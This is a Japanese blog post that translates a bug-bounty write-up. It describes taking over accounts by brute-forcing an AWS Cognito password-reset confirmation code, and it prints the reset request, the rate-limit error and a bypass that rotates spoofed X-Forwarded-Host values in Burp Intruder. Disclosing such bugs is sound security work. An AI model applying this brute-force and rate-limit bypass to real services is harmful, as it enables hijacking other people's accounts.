Shikata Ga Nai

Private? There is no such things.

Account Takeover with rate limit bypassを訳してみた

Hello there, ('ω')ノ

 

レート制限バイパスによるアカウント乗っ取りを。

 

脆弱性:

 レート制限バイパス

 アカウント乗っ取り

 

記事:

 https://medium.com/@shamimahamed666070/account-takeover-with-rate-limit-bypass-f28c5089a1eb

 

今回は、悪意のあるユーザがそのターゲット サイトの任意のアカウントを

乗っ取ることができた可能性のある有効なバグに関する記事を。

会社名は明かせないので、「target.sultandine.com」とて。

Burp Suiteで、このようなリクエストが。

 

POST / HTTP/2
Host:target.sultandine.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://my.tomorrowland.com/
Content-Type: application/x-amz-json-1.1
X-Amz-Target: AWSCognitoIdentityProviderService.ConfirmForgotPassword
X-Amz-User-Agent: aws-amplify/5.0.4 js
Origin: https://my.tomorrowland.com
Content-Length: 128
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers

{"ClientId":"1mf0i80fpuq6mqv5pmgpjb8veg","Username":"lasas28845@galcake.com","ConfirmationCode":"865732","Password":"shamim017"}

 

これをテストしてオプションを見つけようとしましたが、

パスワードを変更するために使用される ConfirmationCode”:XXXX”、

有効な ConfirmationCode があり。

 

Burp SuiteのIntruderを使用して、ConfirmationCode をブルート フォースして。

ブルート フォース コードに対して非常に多くのリクエストを送信した後、

リクエストがブロックされ。

 

{"__type":"LimitExceededException","message":"Attempt limit exceeded, please try after some time."}

 

次に、リクエストに応じて X-Forwared-Host: 127.0.0.1 を使用して

これをバイパスしようとすると。

これは、制限を正常にバイパスして。

 

Burp SuiteのIntruder を使用して X-Forwared-Host:127.0.0.$1$

複数の IP を変更し、ConfirmationCode で力ずく攻撃を続けると。

非常に多くの有効なコードがパスワードの変更を要求し、

アカウントの乗っ取りに成功して。

 

 

Best regards, (^^ゞ